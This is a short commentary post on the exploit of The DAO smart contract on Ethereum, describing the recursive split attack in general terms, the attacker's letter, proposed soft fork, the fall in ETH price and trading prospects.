On Friday evening, “The DAO” framework code was exploited and subsequently ‘attacked’ which resulted in 3.6m ETH (~$40m at current prices) being ‘stolen’. The tokens are not yet gone, as the DAO’s implementation imposes a significant waiting period.
This was possible from an exploit in the code whereby the attacker called a split function and then called another split function recursively inside of the original split, collecting more ether many times over in a single transaction. This and many other exploits have been well-known for some time and many other contracts are vulnerable.
The attacker, or someone posing as him (the letter was not properly signed) has written an open letter attempting to defend his actions. He claims they are his by the terms of the smart contract. Real attacker or not, he’s not necessarily wrong: the contract is the code itself. This should spur a wider discussion around bugs in Solidity contracts, intent, and how to safely fork. Bugs happen, and any system that assumes otherwise is naive.
The DAO and ETH community have suggested a soft fork which would make any transactions on the attacker’s address invalid, giving the community further time after the 27-day split time to discuss what to do. These actions could ruin confidence not only in The DAO but also in ETH. In response, ETH has already dropped from a high of $21 to a low of $11.
This exposure raises questions about the future and confidence of the DAO and further platforms that wish to replicate it. There will be questions to the founders of the project and to Deja Vu, the security firm who performed the audit on the DAO code. It appears clear that launch was too hasty. The list of serious DAO issues grows by the day.
As Emin Gün Sirer (author of one of the best cryptocurrency & code blogs, Hacking Distributed) writes:
I have to say, calling this specific contract “The DAO” was quite presumptive. It usurped the word, and now ended up tarnishing it.
There have been several good trading opportunities on the top of this. Informed traders had opportunity. If the DAO fixes its code and the stolen ETH are returned, will this be enough to restore faith? If so, then this will be a great buying opportunity for ETH. Otherwise we will continue this downtrend, and the focus on Bitcoin will remain.